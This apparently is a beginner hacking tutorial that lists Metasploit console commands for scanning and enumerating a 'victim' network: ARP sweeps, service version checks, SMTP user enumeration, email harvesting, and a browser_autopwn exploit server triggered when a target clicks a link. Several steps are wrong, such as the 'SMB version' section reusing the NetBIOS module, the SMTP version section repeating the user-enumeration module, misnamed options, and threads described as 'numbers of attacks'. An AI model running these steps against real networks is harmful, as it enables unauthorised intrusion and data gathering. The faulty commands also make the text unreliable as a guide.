We can perform scanning by Metasploit using following auxiliaries.
1) FINDING LIVE COMPUTERS ON A NETWORK:
We can find live computers by metasploit in the network if we have connection with network of our vicim. So run this following commands;
(msfconsole)
(use auxiliary/scanner/discovery/arp_sweep /r)
(show options)
(set RHOST + ip of target /r) e.g. (set RHOST 192.168.1.8 /r)
(set SHOST + ip of your kali Linux /r) e.g. (set SHOST 192.168.1.0)
(set SMAC_MAC address of kali /r) e.g. (set SMAC 9a:4b:2c:24:15:45 /r)
(set THREADS + Numbers of attacks /r) e.g. (set THREAD 255 /r)
(run)
2) TO DISCOVER BROWSER AND EXPLOIT FOR TARGET BROWSER:
We can find browser of target and also exploit to hack the browser of target by Metasploit. So, run the following commands;
(msfconsole)
(use auxiliary/server/browser_ autopwn)
(show options)
(set LHOST + ip of target kali Linux) e.g. (set LHOST 192.168.1.8 )
(set URIPATH + path for target) e.g. (set URIPATH hackingtut)
Now as target will click on our link by using our IP address in his/her browser, then we will get the detail of browser of your target.
(msfconsole)
(use auxiliary/gather/search_email_collector)
(show options)
(set DOMAINS + domain of target website) e.g. (set DOMAIN google.com)
(run)
3) DETECTING SSH VERSION OF TARGET:
We can use following commands to find the ssh of our target;
(msfconsole)
(use auxiliary/ssh/ssh_version)
(show options)
(set RHOSTS + ip of target) e.g. (set RHOSTS 192.168.1.8)
(set THREADS + numbers of attacks) e.g.
(set THREADS 100)
(run)
4) FINDING ADDRESS OR LINKS RELATED TO A DOMAIN:
We can find all urls or links related to a domain by using following commands in Metasploit;
(msfconsole)
(use auxiliary/scanner/http/ enum_wayback)
(show options)
(set DOMAIN + domain of our target website) e.g. (set DOMAIN google.com)
(set OUTFILE + path of output file) e.g.
(set OUTFILE /root/Desktop/links.txt)
5) FINDING THE VERSIONS OF FTP OF TARGET IN METASPLOIT:
We can use the following commands in Metasploit to find the FTP versions of our target;
(msfconsole)
(use scanner/ftp/ftp_version)
(show option)
(set RHOSTS + network range of target) e.g. (set RHOSTS 192.168.8.4/24)
(set THREADS + numbers of attacks) e.g.
(set THREADS 55)
(run)
6) FINDING NETBIOS DETAIL OF TARGET:
We can find the NetBIOS name and other details by using following commands in Metasploit;
(msfconsole)
(use auxiliary/scanner/netbios/nbname)
(show option)
(set RHOSTS + network range of target) e.g. (set RHOSTS 192.168.8.4 -255)
(set THREADS + numbers of attacks) e.g. (set THREADS 10)
(run)
7) FINDING SMB VERSION OF TARGET
We can use the following commands;
(msfconsole)
(use auxiliary/scanner/netbios/nbname)
(show option)
(set RHOSTS + ip of target) e.g. (set RHOSTS 192.168.8.4)
(run)
8) FINDING USERNAMES OF SMTP SERVICE OF TARGET:
We can find the usernames of smtp service of our target by using following commands in metasploit;
(msfconsole)
(use auxiliary/scanner/smtp/smtp_enum)
(show option /r)
(set RHOSTS + ip of target /r) e.g. (set RHOSTS 192.168.8.4 /r)
(run)
9) FINDING SMTP VERSION OF TARGET:
We can find the smtp version of our target by running following commands in Metasploit;
(msfconsole)
(use auxiliary/scanner/smtp/smtp_enum)
(show option /r)
(set RHOSTS + ip of target /r) e.g. (set RHOSTS 192.168.8.4 /r)
(run)
10) FINDING THE DETAIL OF SSL CERTIFICATE OF TARGET:
(msfconsole)
(use auxiliary/scanner/http/ssl)
(show option)
(set RHOSTS + ip of target) e.g. (set RHOSTS 192.168.8.4)
(run)